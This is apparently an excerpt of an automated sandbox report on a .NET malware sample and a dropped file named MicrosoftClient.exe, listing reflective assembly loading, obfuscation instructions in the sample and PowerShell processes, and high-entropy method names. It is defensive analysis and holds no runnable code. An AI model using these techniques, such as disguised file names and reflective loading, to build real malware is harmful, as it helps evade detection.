Source: 9RgE5uOJwX.exe, fWqkE4ezX2E2mwZtGlvGPJxNf.cs	.Net Code: Q9w40NAKVylkpLnEtwd22aJdY
Source: MicrosoftClient.exe.0.dr, fWqkE4ezX2E2mwZtGlvGPJxNf.cs	.Net Code: hi8i65wpblvGWk5oXoxjBQ3BH System.AppDomain.Load(byte[])
Source: MicrosoftClient.exe.0.dr, fWqkE4ezX2E2mwZtGlvGPJxNf.cs	.Net Code: Q9w40NAKVylkpLnEtwd22aJdY System.AppDomain.Load(byte[])
Source: MicrosoftClient.exe.0.dr, fWqkE4ezX2E2mwZtGlvGPJxNf.cs	.Net Code: Q9w40NAKVylkpLnEtwd22aJdY
Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, fWqkE4ezX2E2mwZtGlvGPJxNf.cs	.Net Code: hi8i65wpblvGWk5oXoxjBQ3BH System.AppDomain.Load(byte[])
Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, fWqkE4ezX2E2mwZtGlvGPJxNf.cs	.Net Code: Q9w40NAKVylkpLnEtwd22aJdY System.AppDomain.Load(byte[])
Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, fWqkE4ezX2E2mwZtGlvGPJxNf.cs	.Net Code: Q9w40NAKVylkpLnEtwd22aJdY

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Code function: 0_2_00007FFD343D00BD pushad ; iretd	0_2_00007FFD343D00C1
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Code function: 0_2_00007FFD343D8908 push E95D0F61h; ret	0_2_00007FFD343D8929
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD342ED2A5 pushad ; iretd	2_2_00007FFD342ED2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD344000BD pushad ; iretd	2_2_00007FFD344000C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD344D2316 push 8B485F91h; iretd	2_2_00007FFD344D231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFD342CD2A5 pushad ; iretd	5_2_00007FFD342CD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFD343E00BD pushad ; iretd	5_2_00007FFD343E00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFD344B2316 push 8B485F93h; iretd	5_2_00007FFD344B231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD342BD2A5 pushad ; iretd	8_2_00007FFD342BD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD343D00BD pushad ; iretd	8_2_00007FFD343D00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD343D19D2 pushad ; ret	8_2_00007FFD343D19E1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD344A2316 push 8B485F94h; iretd	8_2_00007FFD344A231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFD342BD2A5 pushad ; iretd	11_2_00007FFD342BD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFD343D00BD pushad ; iretd	11_2_00007FFD343D00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFD344A2316 push 8B485F94h; iretd	11_2_00007FFD344A231B
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Code function: 13_2_00007FFD344000BD pushad ; iretd	13_2_00007FFD344000C1
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Code function: 14_2_00007FFD343E00BD pushad ; iretd	14_2_00007FFD343E00C1

Source: 9RgE5uOJwX.exe, i1P5h3Yf5OnQi96hdLePtGoWhHPkDOJ9r7kQ4YJe6VnvuDEoTVZTFpXOCE.cs	High entropy of concatenated method names: 'ahkLBtcIAydoos0eu62oegKUfAo0SL3L9OD9j2T3JLmGzukbiyeKgLjCSPKg4EYgBnIBxgYtCh0xAeXwNQlEbGdFkA', 'AGw2v2oTlbKKwP5x54MXxcVDYqGPGQpRJipwdHpXHBPAMHi11we4uShSDNBrFuQYexAzu229tcRWrDyimxgzbdEdn7', 'e8sRBQTSKmYnc600qDRn7HAtf9sdYePcpIyv99Zf7KCV6zwVt7RnAo8eGU2j4VbptR4g0yX4svG23wpswKCHRHf2El', 'G2vZaPROQB58OHc93Il4EOQ6qitlnHPGbfidlAllzOQqJ2sZ5skIm', 'WVUPcFQrakwet0BYu6RZOeDnQflzSLDp128QAwVFA2AyCfVhtUp5Y', 'Lk39O2yY6bC2uVjbl0usdQMVKri6n206tM5wIieecU7Hyvy43bY15', 'z1HABQCPwrT0YomXKTfqflk7r7iysVNf40rvYabHoqgiu8hMl5Uf7', 'UUzA3oHXZI6sx4VEhyLrPn3QHw84Px1L7j3ZqKyf05vdV3dBh1tsj', '_2PEvelOuIaYGA3OZocilsXC0IPXEKv3yr4BL6LRL6tZ5PfEKN4cTV', 'JgxDH0Jzmif2muKohDfTiZUT1Ls0cCaHTxkK9yDyY7Vc7wiCfZ7cR'
Source: 9RgE5uOJwX.exe, 01DoJZbphKNMAr7F08AANghctS8eAZzwwVauCQWy.cs	High entropy of concatenated method names: 'jhqnO08Zvk17ev11zCn1tDNyTKV4wrZCE3H2RZPlHLutZ98jo9', 'V9mLFi4rb3GvXaL6EBDv0B8HJqs2WFhtPa3AH0lHf3A2pMXVYJ', 'GgcZLQqItYEUYNnNAZ4QKz0diL9fvAuCxQNymlrnZH4nl6sfyR', '_5nEc0S8xY9P4Ra53Ss7UIayp6ClaHO5HD3EtyBzzym99uzNybf'
Source: 9RgE5uOJwX.exe, CwgUWtA4EqaTAVKSuJbX5wXDfQHTFQ9u4KFXlf86FrRhdWOZZe4aaCgE6NOsP5wgybmILD80wDyjoLU0jDcqZlnSHBFP4AoybT.cs	High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'l7QqVOpv5orfSsK1rVePRY0QScELJRgtOU5S5qrR06ts0FGeXA', 'IMuVwxQ7PzQdOPdwzfvWABKRWs1TXTTNssoFw13dzaRdqhx3JW', 'k2S4f9gpgfpnL665tp9amMtsA5IoP9uFBFbPCgEiwTaSyeTujL', 'kH08bywJ8b6ETVolDtOEmOuJegDH2sdJ14AtxT8fI4GzS2JAOc'
Source: 9RgE5uOJwX.exe, LYQIWx0vxxudRlTzfQ0waGDKlqkAgcH7WUyA3eq2.cs	High entropy of concatenated method names: 'aN8VYkhc0BO34AMF7GwwtAcuEMi8gpLKT0sBVyiJ', 'KF4fWkhGpT0A9Qn818SJnpIJCk1h3stAQcgmNpxB', 'jurUB02cOltjuscD09WWl8F1Os4OJSMGfVHBLrPf', 'u84FUlA8UhiU1Ck0UM3rIdd33UupfVmcENg241d6', 'zBH2q54hjV8xSrFrXE0yEeezAvcde6pR0qEcNUvC', 'Bwlz4YPX68j6SXY3g8EzLyZdsBilO2ilgtMsNFpqHfzWZPH0a1', 'LIScEfY7zZ9tVLYhkj7NZv4T8GgZrwbYaZlOKmPS5UN5HtzRGw', 'zhEDKhI5fm3XXvX7PbMRWPVvQKbIr6tWMUXWD4O9XGBlJ5tM1k', 'YGjf4QSiliOhMxkLAfF03TDhmB4aoUPGEtgyXyGQcXsIlLdYy8', 'JXYPkt8Jc9cHWwIZQVgseSeK4KCbc9BiY7TP3WfRiFuFzwM61c'
Source: 9RgE5uOJwX.exe, NOL8mQQjUWb5gSG3rl5bTFKFn47tOMo4cMsaQhPOWgM911Haj72XSTVGFh.cs	High entropy of concatenated method names: 'MIC0gXm6oQLdJJNexLAZ0VfQp7AyfIaMpbOVt0M1QQZEcmxA7Sf5L9YIUN', 'xoMoqlJJoBCpUws1UFZyAVxdCo4nimVTZ1HAmCp9FfNxYDh18rUDURGbfR', 'uGU04LhSc0DLfZmkwJ41N4uQxupxiuVB5cnzQc7zH1M4R7qywoQDKi0Uc2', 'D2lsPY8vIDAUmaZv38f94w3l14oWYBUSPfO4AlTvZi42FhqpK9xjwmtVdw', 'xLaib1dRWTsno2J1oeKLMQoDEOi7lPfX9wC4ifXlivIfTlYdbKKz1lGYnh', 'maoX0CbSzaK3Rp28VcoiQMu0Yd8lXEdqZ1n97iyuyV8mnHEWcdUtMo32aR', 'Ntyhb7069wrMlb0XmKNw1PHMTQNHhD7FeCZpkZTap14DxxYTvmwaFExi5G', 'ttrAVNH6YBCZfgmZxa3WCFElLj8U1ZNOWuqbF9YWTWc0wemzUYZCmtiKvT', 'oIjsldVLmBsoVjw0x6MU9ifVuMIypjsEe6oxIf0rF11lzjDqVoi4fiHyTd', '_55PjX53gU1NTJU3tah4lib8YBCex6SJjDcIdwVC9HxM9H8ap37s1hNQ2T5'
Source: 9RgE5uOJwX.exe, YIsiQT0bVRZkgJBchQD3mj8TT.cs	High entropy of concatenated method names: '_9EKA4mmYhS5A3Vo7PQ5U8yYpV', '_3F8KZvwIIllQlPE51Q7rT7NP6', '_2MK6IwXfT4BOrv9J3aXyidWkj', '_5T1TMhB3O7StVjktbLYkSdIZp', 'iuuUZwHDvSsobqzAj4G742AIvHkq8JAEWiL', 'DlrOYOIGTZV4eJpPtea5byCrFn4zM8nublj', '_9ILnQINVxIYDQ97TVIaa9YyCpB7EXAW5tom5Es3ncPJ1lS95RaMBwRsWQNgKYutlvNo', 'VXmJfTdoGixB1E5Z1wjgTOteiJOmc6KBc4xrCsqFVbJwXC1iznjrsa7UHQE2XigNpuH', '_5wNIasIaQNeaZwCIvHyKNM1SOqS7HX3huPu0AQBwPzVGiYotwHWJSytkXkzbO10a0u5', 'NqPA5cp23835Re9M2uVQVtMMUJvNAjSqvVFtg3TUx4mDFNPZ8gLyuQYAAKvkocPUew0'
Source: 9RgE5uOJwX.exe, xEidHkjl3ZbqUKvIPhMdYvEBT.cs	High entropy of concatenated method names: 'BDRQ8CiLuswqAppJ4K91S5dh7YdvybCtM3VXEJxg8i33Ed3RgMAv6gmJro', '_2nTtKAoberzYJFa7yq1LShwR8iNGoNekJgkkYX6S1BcPCM8qgTL5QO4WVKcyQKvXUXx', 'CV9weyjNtLvDncWBpl6tyfl7rElfyAYbtml1wChTE2sQe7JYYGIUlJ6anqhPEQaqgxm', 'GmaE3jPyBngvX63rusAkRdVRn1ie9jYpnFfeg98CF9ox4G8MiFGJjJdguFMfwhYFN1T', '_5LiqLS0rriTlip5EnigTqlfbYT3O9Zqp992Vw5piCNSkIp7WEyJpSl0bNpEFgIiES8U'
Source: 9RgE5uOJwX.exe, fWqkE4ezX2E2mwZtGlvGPJxNf.cs	High entropy of concatenated method names: 'LRbYTeQD7H3jkFsPe9vpLFlDK', 'hi8i65wpblvGWk5oXoxjBQ3BH', 'l54elty1mfujUEGBMp1X01hln', 'wMGCYdFEkNKYe9j3GZMkOGgBb', '_7ufBfU62R4YZocKbpyUGXuknW', 'vXnHhVT57mZluAzRt80l5DsC6', 'Xyybo5TncnAaF1HAYGa0X7pSt', 'FjPS8U7KdFCmJBM975RiRSOwG', 'q0i2kZtvL6SyvbPYW8hbQYPfk', 'PDkuHMfS9HsSe85HDqEfRBcdl'
Source: 9RgE5uOJwX.exe, a5vqhNcXHqNHEz8q3VSMya6o4.cs	High entropy of concatenated method names: 'tcLVTujiwrEFL1XBqaq0Gkulh', '_6YDoJioH7lq3A9fcfwP6t5FusMNbaJDowzB', 'zY6zaLyg7utnR5pYiU0cNBx8deQoNVFn4FM', 'Rpmrt7znvurUSjgCFVpoXZqCBkQRHATCDfT', 'B6vwsK21WX1UISAfEue3xQtBL56Pan3z3w4'
Source: 9RgE5uOJwX.exe, CnWmUhjCIbNhf9LAxoCrrslxDzc1x6Th0W6g3YXN.cs	High entropy of concatenated method names: '_3LFonnJfMRrLHdpajh1txoztqe85dV2AVPAe2ScC', 'A4Ca0fThPYuMM71E9HMZWq5tGxpad03yOTvETA0o', 'pcaW3zWDHX7MVjNus91u9hKz7', 'Jp9k7fXgQoYDxMbOc7uHDDsth', 'nWxxEIQKgRUY1dWWi3OQPdZ89', 'STGNxbu4HbCk1zVHeAiYEueIa', 'Qmu9tHeWTcvzanYgBmEpbSdxN', 'FpuhZCDsHlAP5KMW0BQMk5HSp', 'uCtfHWlMzsUBm2H6W1BOk8o0J', 'cMoLfn0A28VUYcraKWobh80Nc'
Source: MicrosoftClient.exe.0.dr, i1P5h3Yf5OnQi96hdLePtGoWhHPkDOJ9r7kQ4YJe6VnvuDEoTVZTFpXOCE.cs	High entropy of concatenated method names: 'ahkLBtcIAydoos0eu62oegKUfAo0SL3L9OD9j2T3JLmGzukbiyeKgLjCSPKg4EYgBnIBxgYtCh0xAeXwNQlEbGdFkA', 'AGw2v2oTlbKKwP5x54MXxcVDYqGPGQpRJipwdHpXHBPAMHi11we4uShSDNBrFuQYexAzu229tcRWrDyimxgzbdEdn7', 'e8sRBQTSKmYnc600qDRn7HAtf9sdYePcpIyv99Zf7KCV6zwVt7RnAo8eGU2j4VbptR4g0yX4svG23wpswKCHRHf2El', 'G2vZaPROQB58OHc93Il4EOQ6qitlnHPGbfidlAllzOQqJ2sZ5skIm', 'WVUPcFQrakwet0BYu6RZOeDnQflzSLDp128QAwVFA2AyCfVhtUp5Y', 'Lk39O2yY6bC2uVjbl0usdQMVKri6n206tM5wIieecU7Hyvy43bY15', 'z1HABQCPwrT0YomXKTfqflk7r7iysVNf40rvYabHoqgiu8hMl5Uf7', 'UUzA3oHXZI6sx4VEhyLrPn3QHw84Px1L7j3ZqKyf05vdV3dBh1tsj', '_2PEvelOuIaYGA3OZocilsXC0IPXEKv3yr4BL6LRL6tZ5PfEKN4cTV', 'JgxDH0Jzmif2muKohDfTiZUT1Ls0cCaHTxkK9yDyY7Vc7wiCfZ7cR'
Source: MicrosoftClient.exe.0.dr, 01DoJZbphKNMAr7F08AANghctS8eAZzwwVauCQWy.cs	High entropy of concatenated method names: 'jhqnO08Zvk17ev11zCn1tDNyTKV4wrZCE3H2RZPlHLutZ98jo9', 'V9mLFi4rb3GvXaL6EBDv0B8HJqs2WFhtPa3AH0lHf3A2pMXVYJ', 'GgcZLQqItYEUYNnNAZ4QKz0diL9fvAuCxQNymlrnZH4nl6sfyR', '_5nEc0S8xY9P4Ra53Ss7UIayp6ClaHO5HD3EtyBzzym99uzNybf'
Source: MicrosoftClient.exe.0.dr, CwgUWtA4EqaTAVKSuJbX5wXDfQHTFQ9u4KFXlf86FrRhdWOZZe4aaCgE6NOsP5wgybmILD80wDyjoLU0jDcqZlnSHBFP4AoybT.cs	High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'l7QqVOpv5orfSsK1rVePRY0QScELJRgtOU5S5qrR06ts0FGeXA', 'IMuVwxQ7PzQdOPdwzfvWABKRWs1TXTTNssoFw13dzaRdqhx3JW', 'k2S4f9gpgfpnL665tp9amMtsA5IoP9uFBFbPCgEiwTaSyeTujL', 'kH08bywJ8b6ETVolDtOEmOuJegDH2sdJ14AtxT8fI4GzS2JAOc'
Source: MicrosoftClient.exe.0.dr, LYQIWx0vxxudRlTzfQ0waGDKlqkAgcH7WUyA3eq2.cs	High entropy of concatenated method names: 'aN8VYkhc0BO34AMF7GwwtAcuEMi8gpLKT0sBVyiJ', 'KF4fWkhGpT0A9Qn818SJnpIJCk1h3stAQcgmNpxB', 'jurUB02cOltjuscD09WWl8F1Os4OJSMGfVHBLrPf', 'u84FUlA8UhiU1Ck0UM3rIdd33UupfVmcENg241d6', 'zBH2q54hjV8xSrFrXE0yEeezAvcde6pR0qEcNUvC', 'Bwlz4YPX68j6SXY3g8EzLyZdsBilO2ilgtMsNFpqHfzWZPH0a1', 'LIScEfY7zZ9tVLYhkj7NZv4T8GgZrwbYaZlOKmPS5UN5HtzRGw', 'zhEDKhI5fm3XXvX7PbMRWPVvQKbIr6tWMUXWD4O9XGBlJ5tM1k', 'YGjf4QSiliOhMxkLAfF03TDhmB4aoUPGEtgyXyGQcXsIlLdYy8', 'JXYPkt8Jc9cHWwIZQVgseSeK4KCbc9BiY7TP3WfRiFuFzwM61c'
Source: MicrosoftClient.exe.0.dr, NOL8mQQjUWb5gSG3rl5bTFKFn47tOMo4cMsaQhPOWgM911Haj72XSTVGFh.cs	High entropy of concatenated method names: 'MIC0gXm6oQLdJJNexLAZ0VfQp7AyfIaMpbOVt0M1QQZEcmxA7Sf5L9YIUN', 'xoMoqlJJoBCpUws1UFZyAVxdCo4nimVTZ1HAmCp9FfNxYDh18rUDURGbfR', 'uGU04LhSc0DLfZmkwJ41N4uQxupxiuVB5cnzQc7zH1M4R7qywoQDKi0Uc2', 'D2lsPY8vIDAUmaZv38f94w3l14oWYBUSPfO4AlTvZi42FhqpK9xjwmtVdw', 'xLaib1dRWTsno2J1oeKLMQoDEOi7lPfX9wC4ifXlivIfTlYdbKKz1lGYnh', 'maoX0CbSzaK3Rp28VcoiQMu0Yd8lXEdqZ1n97iyuyV8mnHEWcdUtMo32aR', 'Ntyhb7069wrMlb0XmKNw1PHMTQNHhD7FeCZpkZTap14DxxYTvmwaFExi5G', 'ttrAVNH6YBCZfgmZxa3WCFElLj8U1ZNOWuqbF9YWTWc0wemzUYZCmtiKvT', 'oIjsldVLmBsoVjw0x6MU9ifVuMIypjsEe6oxIf0rF11lzjDqVoi4fiHyTd', '_55PjX53gU1NTJU3tah4lib8YBCex6SJjDcIdwVC9HxM9H8ap37s1hNQ2T5'
Source: MicrosoftClient.exe.0.dr, YIsiQT0bVRZkgJBchQD3mj8TT.cs	High entropy of concatenated method names: '_9EKA4mmYhS5A3Vo7PQ5U8yYpV', '_3F8KZvwIIllQlPE51Q7rT7NP6', '_2MK6IwXfT4BOrv9J3aXyidWkj', '_5T1TMhB3O7StVjktbLYkSdIZp', 'iuuUZwHDvSsobqzAj4G742AIvHkq8JAEWiL', 'DlrOYOIGTZV4eJpPtea5byCrFn4zM8nublj', '_9ILnQINVxIYDQ97TVIaa9YyCpB7EXAW5tom5Es3ncPJ1lS95RaMBwRsWQNgKYutlvNo', 'VXmJfTdoGixB1E5Z1wjgTOteiJOmc6KBc4xrCsqFVbJwXC1iznjrsa7UHQE2XigNpuH', '_5wNIasIaQNeaZwCIvHyKNM1SOqS7HX3huPu0AQBwPzVGiYotwHWJSytkXkzbO10a0u5', 'NqPA5cp23835Re9M2uVQVtMMUJvNAjSqvVFtg3TUx4mDFNPZ8gLyuQYAAKvkocPUew0'
Source: MicrosoftClient.exe.0.dr, xEidHkjl3ZbqUKvIPhMdYvEBT.cs	High entropy of concatenated method names: 'BDRQ8CiLuswqAppJ4K91S5dh7YdvybCtM3VXEJxg8i33Ed3RgMAv6gmJro', '_2nTtKAoberzYJFa7yq1LShwR8iNGoNekJgkkYX6S1BcPCM8qgTL5QO4WVKcyQKvXUXx', 'CV9weyjNtLvDncWBpl6tyfl7rElfyAYbtml1wChTE2sQe7JYYGIUlJ6anqhPEQaqgxm', 'GmaE3jPyBngvX63rusAkRdVRn1ie9jYpnFfeg98CF9ox4G8MiFGJjJdguFMfwhYFN1T', '_5LiqLS0rriTlip5EnigTqlfbYT3O9Zqp992Vw5piCNSkIp7WEyJpSl0bNpEFgIiES8U'
Source: MicrosoftClient.exe.0.dr, fWqkE4ezX2E2mwZtGlvGPJxNf.cs	High entropy of concatenated method names: 'LRbYTeQD7H3jkFsPe9vpLFlDK', 'hi8i65wpblvGWk5oXoxjBQ3BH', 'l54elty1mfujUEGBMp1X01hln', 'wMGCYdFEkNKYe9j3GZMkOGgBb', '_7ufBfU62R4YZocKbpyUGXuknW', 'vXnHhVT57mZluAzRt80l5DsC6', 'Xyybo5TncnAaF1HAYGa0X7pSt', 'FjPS8U7KdFCmJBM975RiRSOwG', 'q0i2kZtvL6SyvbPYW8hbQYPfk', 'PDkuHMfS9HsSe85HDqEfRBcdl'
Source: MicrosoftClient.exe.0.dr, a5vqhNcXHqNHEz8q3VSMya6o4.cs	High entropy of concatenated method names: 'tcLVTujiwrEFL1XBqaq0Gkulh', '_6YDoJioH7lq3A9fcfwP6t5FusMNbaJDowzB', 'zY6zaLyg7utnR5pYiU0cNBx8deQoNVFn4FM', 'Rpmrt7znvurUSjgCFVpoXZqCBkQRHATCDfT', 'B6vwsK21WX1UISAfEue3xQtBL56Pan3z3w4'
Source: MicrosoftClient.exe.0.dr, CnWmUhjCIbNhf9LAxoCrrslxDzc1x6Th0W6g3YXN.cs	High entropy of concatenated method names: '_3LFonnJfMRrLHdpajh1txoztqe85dV2AVPAe2ScC', 'A4Ca0fThPYuMM71E9HMZWq5tGxpad03yOTvETA0o', 'pcaW3zWDHX7MVjNus91u9hKz7', 'Jp9k7fXgQoYDxMbOc7uHDDsth', 'nWxxEIQKgRUY1dWWi3OQPdZ89', 'STGNxbu4HbCk1zVHeAiYEueIa', 'Qmu9tHeWTcvzanYgBmEpbSdxN', 'FpuhZCDsHlAP5KMW0BQMk5HSp', 'uCtfHWlMzsUBm2H6W1BOk8o0J', 'cMoLfn0A28VUYcraKWobh80Nc'
Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, i1P5h3Yf5OnQi96hdLePtGoWhHPkDOJ9r7kQ4YJe6VnvuDEoTVZTFpXOCE.cs	High entropy of concatenated method names: 'ahkLBtcIAydoos0eu62oegKUfAo0SL3L9OD9j2T3JLmGzukbiyeKgLjCSPKg4EYgBnIBxgYtCh0xAeXwNQlEbGdFkA', 'AGw2v2oTlbKKwP5x54MXxcVDYqGPGQpRJipwdHpXHBPAMHi11we4uShSDNBrFuQYexAzu229tcRWrDyimxgzbdEdn7', 'e8sRBQTSKmYnc600qDRn7HAtf9sdYePcpIyv99Zf7KCV6zwVt7RnAo8eGU2j4VbptR4g0yX4svG23wpswKCHRHf2El', 'G2vZaPROQB58OHc93Il4EOQ6qitlnHPGbfidlAllzOQqJ2sZ5skIm', 'WVUPcFQrakwet0BYu6RZOeDnQflzSLDp128QAwVFA2AyCfVhtUp5Y', 'Lk39O2yY6bC2uVjbl0usdQMVKri6n206tM5wIieecU7Hyvy43bY15', 'z1HABQCPwrT0YomXKTfqflk7r7iysVNf40rvYabHoqgiu8hMl5Uf7', 'UUzA3oHXZI6sx4VEhyLrPn3QHw84Px1L7j3ZqKyf05vdV3dBh1tsj', '_2PEvelOuIaYGA3OZocilsXC0IPXEKv3yr4BL6LRL6tZ5PfEKN4cTV', 'JgxDH0Jzmif2muKohDfTiZUT1Ls0cCaHTxkK9yDyY7Vc7wiCfZ7cR'
Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, 01DoJZbphKNMAr7F08AANghctS8eAZzwwVauCQWy.cs	High entropy of concatenated method names: 'jhqnO08Zvk17ev11zCn1tDNyTKV4wrZCE3H2RZPlHLutZ98jo9', 'V9mLFi4rb3GvXaL6EBDv0B8HJqs2WFhtPa3AH0lHf3A2pMXVYJ', 'GgcZLQqItYEUYNnNAZ4QKz0diL9fvAuCxQNymlrnZH4nl6sfyR', '_5nEc0S8xY9P4Ra53Ss7UIayp6ClaHO5HD3EtyBzzym99uzNybf'
Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, CwgUWtA4EqaTAVKSuJbX5wXDfQHTFQ9u4KFXlf86FrRhdWOZZe4aaCgE6NOsP5wgybmILD80wDyjoLU0jDcqZlnSHBFP4AoybT.cs	High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'l7QqVOpv5orfSsK1rVePRY0QScELJRgtOU5S5qrR06ts0FGeXA', 'IMuVwxQ7PzQdOPdwzfvWABKRWs1TXTTNssoFw13dzaRdqhx3JW', 'k2S4f9gpgfpnL665tp9amMtsA5IoP9uFBFbPCgEiwTaSyeTujL', 'kH08bywJ8b6ETVolDtOEmOuJegDH2sdJ14AtxT8fI4GzS2JAOc'
Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, LYQIWx0vxxudRlTzfQ0waGDKlqkAgcH7WUyA3eq2.cs	High entropy of concatenated method names: 'aN8VYkhc0BO34AMF7GwwtAcuEMi8gpLKT0sBVyiJ', 'KF4fWkhGpT0A9Qn818SJnpIJCk1h3stAQcgmNpxB', 'jurUB02cOltjuscD09WWl8F1Os4OJSMGfVHBLrPf', 'u84FUlA8UhiU1Ck0UM3rIdd33UupfVmcENg241d6', 'zBH2q54hjV8xSrFrXE0yEeezAvcde6pR0qEcNUvC', 'Bwlz4YPX68j6SXY3g8EzLyZdsBilO2ilgtMsNFpqHfzWZPH0a1', 'LIScEfY7zZ9tVLYhkj7NZv4T8GgZrwbYaZlOKmPS5UN5HtzRGw', 'zhEDKhI5fm3XXvX7PbMRWPVvQKbIr6tWMUXWD4O9XGBlJ5tM1k', 'YGjf4QSiliOhMxkLAfF03TDhmB4aoUPGEtgyXyGQcXsIlLdYy8', 'JXYPkt8Jc9cHWwIZQVgseSeK4KCbc9BiY7TP3WfRiFuFzwM61c'
Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, NOL8mQQjUWb5gSG3rl5bTFKFn47tOMo4cMsaQhPOWgM911Haj72XSTVGFh.cs	High entropy of concatenated method names: 'MIC0gXm6oQLdJJNexLAZ0VfQp7AyfIaMpbOVt0M1QQZEcmxA7Sf5L9YIUN', 'xoMoqlJJoBCpUws1UFZyAVxdCo4nimVTZ1HAmCp9FfNxYDh18rUDURGbfR', 'uGU04LhSc0DLfZmkwJ41N4uQxupxiuVB5cnzQc7zH1M4R7qywoQDKi0Uc2', 'D2lsPY8vIDAUmaZv38f94w3l14oWYBUSPfO4AlTvZi42FhqpK9xjwmtVdw', 'xLaib1dRWTsno2J1oeKLMQoDEOi7lPfX9wC4ifXlivIfTlYdbKKz1lGYnh', 'maoX0CbSzaK3Rp28VcoiQMu0Yd8lXEdqZ1n97iyuyV8mnHEWcdUtMo32aR', 'Ntyhb7069wrMlb0XmKNw1PHMTQNHhD7FeCZpkZTap14DxxYTvmwaFExi5G', 'ttrAVNH6YBCZfgmZxa3WCFElLj8U1ZNOWuqbF9YWTWc0wemzUYZCmtiKvT', 'oIjsldVLmBsoVjw0x6MU9ifVuMIypjsEe6oxIf0rF11lzjDqVoi4fiHyTd', '_55PjX53gU1NTJU3tah4lib8YBCex6SJjDcIdwVC9HxM9H8ap37s1hNQ2T5'
Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, YIsiQT0bVRZkgJBchQD3mj8TT.cs	High entropy of concatenated method names: '_9EKA4mmYhS5A3Vo7PQ5U8yYpV', '_3F8KZvwIIllQlPE51Q7rT7NP6', '_2MK6IwXfT4BOrv9J3aXyidWkj', '_5T1TMhB3O7StVjktbLYkSdIZp', 'iuuUZwHDvSsobqzAj4G742AIvHkq8JAEWiL', 'DlrOYOIGTZV4eJpPtea5byCrFn4zM8nublj', '_9ILnQINVxIYDQ97TVIaa9YyCpB7EXAW5tom5Es3ncPJ1lS95RaMBwRsWQNgKYutlvNo', 'VXmJfTdoGixB1E5Z1wjgTOteiJOmc6KBc4xrCsqFVbJwXC1iznjrsa7UHQE2XigNpuH', '_5wNIasIaQNeaZwCIvHyKNM1SOqS7HX3huPu0AQBwPzVGiYotwHWJSytkXkzbO10a0u5', 'NqPA5cp23835Re9M2uVQVtMMUJvNAjSqvVFtg3TUx4mDFNPZ8gLyuQYAAKvkocPUew0'
Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, xEidHkjl3ZbqUKvIPhMdYvEBT.cs	High entropy of concatenated method names: 'BDRQ8CiLuswqAppJ4K91S5dh7YdvybCtM3VXEJxg8i33Ed3RgMAv6gmJro', '_2nTtKAoberzYJFa7yq1LShwR8iNGoNekJgkkYX6S1BcPCM8qgTL5QO4WVKcyQKvXUXx', 'CV9weyjNtLvDncWBpl6tyfl7rElfyAYbtml1wChTE2sQe7JYYGIUlJ6anqhPEQaqgxm', 'GmaE3jPyBngvX63rusAkRdVRn1ie9jYpnFfeg98CF9ox4G8MiFGJjJdguFMfwhYFN1T', '_5LiqLS0rriTlip5EnigTqlfbYT3O9Zqp992Vw5piCNSkIp7WEyJpSl0bNpEFgIiES8U'
Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, fWqkE4ezX2E2mwZtGlvGPJxNf.cs	High entropy of concatenated method names: 'LRbYTeQD7H3jkFsPe9vpLFlDK', 'hi8i65wpblvGWk5oXoxjBQ3BH', 'l54elty1mfujUEGBMp1X01hln', 'wMGCYdFEkNKYe9j3GZMkOGgBb', '_7ufBfU62R4YZocKbpyUGXuknW', 'vXnHhVT57mZluAzRt80l5DsC6', 'Xyybo5TncnAaF1HAYGa0X7pSt', 'FjPS8U7KdFCmJBM975RiRSOwG', 'q0i2kZtvL6SyvbPYW8hbQYPfk', 'PDkuHMfS9HsSe85HDqEfRBcdl'
Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, a5vqhNcXHqNHEz8q3VSMya6o4.cs	High entropy of concatenated method names: 'tcLVTujiwrEFL1XBqaq0Gkulh', '_6YDoJioH7lq3A9fcfwP6t5FusMNbaJDowzB', 'zY6zaLyg7utnR5pYiU0cNBx8deQoNVFn4FM', 'Rpmrt7znvurUSjgCFVpoXZqCBkQRHATCDfT', 'B6vwsK21WX1UISAfEue3xQtBL56Pan3z3w4'
